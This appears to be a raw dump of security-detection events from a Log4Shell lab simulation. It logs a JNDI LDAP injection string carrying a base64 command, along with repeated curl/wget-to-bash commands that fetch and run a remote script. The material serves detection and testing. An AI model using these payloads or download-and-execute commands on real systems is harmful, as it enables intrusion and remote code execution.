annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell 